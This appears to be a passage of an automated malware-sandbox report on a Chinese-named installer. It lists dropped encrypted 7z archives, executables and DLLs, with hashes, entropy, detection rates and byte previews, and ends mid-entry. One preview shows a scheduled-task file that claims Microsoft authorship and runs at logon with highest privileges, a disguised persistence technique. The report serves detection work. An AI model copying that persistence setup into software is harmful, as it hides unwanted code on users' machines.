                        Preview:.@S.....?..,................H..v\t4..{@.Ae.RIm...w..8Q.........G..W..7..x.mX.-....Yg..x.2"l..,...yFP;...D?b.......m...!(M.Y..5.*qk..3.j.U.2......!i..$.s.I.W..i.......zQ....X..E*o.I.._..>"...O.@....S8..L1X.P....3_.C.,H`.........zmp ...x..........4_...E.`X{7.T.@e.1.>...v. .......u8.;...z...w...n.....v*.....o%...v.N](....P..2...z..G.r.^.;U/...kN....1tEn.i..F....q.u..y[.....B..%C.S3..X....B....&H.e....o.T..{...=.+6uq._..y.....i.7.%"w#...I...k.n.5..r.'l....u.......m.M.v.6.}.....U.*Jp<.}.?k... .$.*./.f!R......N....Sr......ys..&....m...'PG.:c...*f.7.....v.j.'.4.'W..$.F.g......LV...FL!!4.$QG.K..v..SZv.....{a..,u.%..{9....~MR.>..e.<.......20..GI.........x..IB.n5..C.G....@w..a......[.R.a.Y Np."........*.b...m..4P...1C...M....*.{>^..e...-c..N.BS.e...*.Wr.a._......V.Y..D.l..<;.HZ'.\.../..G.i.=......*..k...h..j.....r.%+!.V...p.vgQf....Z*.h<.Q[~g..}^.iH]..........J.<....<K.G.(.C....`....ry.....v..Wu>....r1u..ZA.".d..LAQ.F..._...#..Y&.....~.J...
                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):56530
                        Entropy (8bit):7.996846847347508
                        Encrypted:true
                        SSDEEP:1536:d3d+5x5q0iGMxg8m/iN5a2Sb+R+VgNf3Teh3k:dU5ZihSwXLRtCtk
                        MD5:406F89570AF6C412A867A8E4D82B6153
                        SHA1:8BE8D777BFB0D3FD74A143A243F87BBD647B4A0E
                        SHA-256:D5C6788AA1BA538E77DD1C26191FE9F3E9C78C080A85D903F7FD886D5ABAD25F
                        SHA-512:105181CC03B9E640164ABE7F55329F40D683540AD717501E3C5DEA283773275C3DF7D812BB888CCB10864402DB87AD1ABE9BACAC3B31C5FCF41769D769165D8A
                        Malicious:false
                        Preview:.@S.......@| ..............].!..........#Rk0cc..J...i.W.4.".....A..8c..........D..aB?....W..&....EA...z7...d_..M..%..Po..f*0n.t...IM....c.Y.D.].3W9Q...I..B..q]...'n....d%K.x..).A..l'...o..k.cR..i".X...`....R5a.....bE..U.m.U....j.(.O.a..........F"s:#Cd..SP..h1..,..X.T(...ZZ.0fn..V..:.;.....M{.GLm.o....L...sp..p...m.[.Q.....->9.m...{.UZ...p....f.;.l....G=....]....*.j.D.|yV.....2l.......^.o.|..R6.|%Hz.Xawu+..U.2.c../...C.`.O...f.......o.....5V.wB..S5..4p..2.;..q..f.Yb..d..=2.s..:....L.X..(B..F.6.am.j...P.c...*4.O.Z ...M,.!tX....=q...x.n>.C..<..8......]..".x..c.=>.l......t...(. .,......J,.Z..\.w{M..`....Z....p.6..VD..@v..G..S$K+.MLT.*eo.g.A...-.nPZ..lU9(Y....Kn..A...WvfD...*<%......8!..Q..%^"..)>XX..*A..*...$...YbE....@.C*.>.l.....;..@G._.l.-.L.x.q..n\.r_.M....YD..`x.>|....g ...J....q^.'.B@.i..0.Kq.W.........P....>.>.84.o.7z....0.8.h$b......0.D....%.*.....w..JR.7...............NJ;.......pP...|[E...4...A....x..h.T.)h+..8,G..&..k.@..y-.}..o
                        Process:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:7-zip archive data, version 0.4
                        Category:dropped
                        Size (bytes):56530
                        Entropy (8bit):7.996846847347513
                        Encrypted:true
                        SSDEEP:768:nJuAKIP8alGZ+u/rCpvHZIUA3xWysFN7PyhuhvbBEx7+b4TkXSycsQEnMpVb+9wm:nJuAz8rQq0vHZxO2ZMa4TxxcMpBofv
                        MD5:49B76BC1C12C1594EFAFA82A76F434A9
                        SHA1:1282B1609F0635D38D91AD3E3472FD3EAFE87703
                        SHA-256:3AEF2C31530F1EB8D4205F025C231D1B841B7D1368C1F00DDEECA329A94DAD22
                        SHA-512:09FF6AFC4E9CD9002ECCF66A02675FC5485B0D23E00B9DB5AF5BB976295DCA78D8D7C959628C4FFAE0D577A354D2B0C0E101C61A27D4C6DEACEE36DF3C8F05C6
                        Malicious:false
                        Preview:7z..'.....C.........2..........oJ...>*.......^5."?<.l.,.r.Xed6G..!G[.]k]KR.lF...},...dm.L.k..e^.3...<H../.9...3.].K......B....x.....J.5.`.H.![.7..4.w.j..6-A...F..u.*...n..;.".'>_...8]G.Tm.5..-.....4.c.)b.$wM..F..}...e\.H.G.J.B...T.K.$...b.K.}2~.........}...u..5*.6LP.3..Ou*..U....ZK...4.iGP.......wS..4@.....<..^...%fd.u..S.z.g.......X..\.x.fX..H......a(..S:...Mo..f. .......M..%~[.R%.=Pv.Y.P.MK..G.......V.X........n.8.8...C|..$...4.P.Z..PQ.)..4$n..g..J7....W..|U.h.....G...p.P..!.Hv...4PC.y..,.I..5.hv(E.^..;...0.:...5`w.....Fm}|..}.'.....6.......jBfJNJ.G..*\.Kd.4...".z..H.AL~.c...%)i.$.|..0.l...........M....9.C..O..^ ..2Kf..H...k...V....$...'.l...H}....TZ2....H..v37...........$..y....n......R...d..\...6..-..l....4.._..J.+.CwZ...0...8.#.t...E.*..v.....i.9.6...H'....L.17...CT...M.......o..xk.Y..U..wrzX.ceh5/.v...m...T..?K...Z(;.U...*...YX..f$.~.d).....fd....9.W..&...}M!dTy{`\x.......oE;..2_j.k.....P.w.Og..)C.IW.8?s.q....PC..C..p(.......s....
                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):56546
                        Entropy (8bit):7.996966859255975
                        Encrypted:true
                        SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                        MD5:CEA69F993E1CE0FB945A98BF37A66546
                        SHA1:7114365265F041DA904574D1F5876544506F89BA
                        SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                        SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                        Malicious:false
                        Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                        Process:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:7-zip archive data, version 0.4
                        Category:dropped
                        Size (bytes):56546
                        Entropy (8bit):7.996966859255979
                        Encrypted:true
                        SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                        MD5:4CB8B7E557C80FC7B014133AB834A042
                        SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                        SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                        SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                        Malicious:false
                        Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):31890
                        Entropy (8bit):7.99402458740637
                        Encrypted:true
                        SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                        MD5:8622FC7228777F64A47BD6C61478ADD9
                        SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                        SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                        SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                        Malicious:false
                        Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                        Process:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:7-zip archive data, version 0.4
                        Category:dropped
                        Size (bytes):31890
                        Entropy (8bit):7.99402458740637
                        Encrypted:true
                        SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                        MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                        SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                        SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                        SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                        Malicious:false
                        Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):74960
                        Entropy (8bit):7.99759370165655
                        Encrypted:true
                        SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                        MD5:950338D50B95A25F494EE74E97B7B7A9
                        SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                        SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                        SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                        Malicious:false
                        Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                        Process:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:7-zip archive data, version 0.4
                        Category:dropped
                        Size (bytes):74960
                        Entropy (8bit):7.997593701656546
                        Encrypted:true
                        SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                        MD5:059BA7C31F3E227356CA5F29E4AA2508
                        SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                        SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                        SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                        Malicious:false
                        Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):29730
                        Entropy (8bit):7.994290657653607
                        Encrypted:true
                        SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                        MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                        SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                        SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                        SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                        Malicious:false
                        Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                        Process:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:7-zip archive data, version 0.4
                        Category:dropped
                        Size (bytes):29730
                        Entropy (8bit):7.994290657653608
                        Encrypted:true
                        SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                        MD5:A9C8A3E00692F79E1BA9693003F85D18
                        SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                        SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                        SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                        Malicious:false
                        Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                        Process:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:7-zip archive data, version 0.4
                        Category:dropped
                        Size (bytes):249968
                        Entropy (8bit):7.999303164107084
                        Encrypted:true
                        SSDEEP:6144:K7uc9uX4FyDbSpY3S7Z/Xjm3sGhiO1E0u72BDT0BVIe9tz:UuRX4Q+ksGrTu8DTs9tz
                        MD5:F3680A817D62E5327D9AA7F965C66559
                        SHA1:9346F4AA534F1B90E9F39AE3D945195B62DC4218
                        SHA-256:39CA13B6C0C9A99BF516874DE1665E628ACC08DB2DCB8AC3C292C72FC9640C72
                        SHA-512:B2E01984421AADB6DF32D5C3A2897A43329DC359E507372E1BC89DBC8318058804D2B3A793574A9C273857A64269538A6DA5DA4076F72E17C394DF275AA979ED
                        Malicious:false
                        Preview:7z..'...G.1\........@.......3.....|...c..&....:*Y.~..e&'~O.ye.m...@.M..9..}.....[g]..%i..#T...#.6o.f.....?O....JnqK.dtJ.4RG...X.1]D..B.._7k.P.g.b.K>.V.5.Ls.Y..I....X.....xV...;bib.'q../.J+.D...p...L..+)3...4.....N>uN...^..J$.K@jc..S....+w.?.{C.$<....Qe..g...[....H.(....p.JZ8..Mm..x.'xa.A......m..ntX.e..*.50...]z.,....K7k.<....o...0...s0.p[.....o..k%...N6.....>\.=[..M.....U.bN=.*....q..y'..q.../.G!....K.z...8.W.kS..;...T.K .3|...j.l.....W.l.).DLb...".7@..|.L,...8I.6...1....c.u..n.]#.......p.~|5.a.*.`.v..&...2).)&sa.e..A........)a%Y.....\..$.h|..:..IvXV.....?.z.[....b.ULStfm...6..........<U.wX...G....G..zk.9a.g...x.`.!...G.Y5.v..;;......P#..u...x..r.....i..W..zx..)q.R.!...?..N.go..K...@...}...".BD#..^..9.=.-.3)..#..jd...>,i....vC.BG...S......f?.....k.c.p...l.".bz.{.wm..9....|/...(.x.X..Y...X..._.....8./.U.......jk..n.....cI......b.....Z..X....*J_eRi.C...p.xN_J..;.b.t.Y*...&!...-.....KH...JK)...]'W../.:.Rv....q.sh`.T.{..Gh...j[..n...|..
                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                        File Type:PE32+ executable (native) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):63640
                        Entropy (8bit):6.482810107683822
                        Encrypted:false
                        SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                        MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                        SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                        SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                        SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 3%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                        Process:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:data
                        Category:dropped
                        Size (bytes):4096
                        Entropy (8bit):3.347329250663303
                        Encrypted:false
                        SSDEEP:48:dXKLzDlnbL6w0QldOVQOj933ODOiTdKbKsz72eW+5y9:dXazDlnKwhldOVQOj6dKbKsz7
                        MD5:0B22A2EDD065A1C81E971548277C256F
                        SHA1:E8C9021B2A56BD2845B2E4322A77755AE12FE197
                        SHA-256:C45C719A48CE574E67FDA9B816E972913BDCC33A5B414DFC9A31E5B55118E50B
                        SHA-512:8D36C6B062EB505CCF3B2E69307FD2526D8FD0D6DA411E8E26266ACC7DFD4B7330B01CF7161F0F8CB6B75C547A3F15525EF5DC18BB25BE34B214522D24942E95
                        Malicious:false
                        Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvai
                        Process:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                        Category:dropped
                        Size (bytes):5649408
                        Entropy (8bit):6.392614480390128
                        Encrypted:false
                        SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                        MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                        SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                        SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                        SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                        Process:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):3584000
                        Entropy (8bit):7.00283805408099
                        Encrypted:false
                        SSDEEP:49152:E7vv7WClWZ7sR4YW+AKb+JE/zEVa9BKRe71MzuiehWIKxZFh2GSTujbNMLC+z/gQ:E7H77lWrYW+X4Va9BKRe71MzSRi6yQ
                        MD5:4DB75814BF4A212D3AEBA5831C059402
                        SHA1:3674F7371C875A8E338C3374D5C5B58420944C55
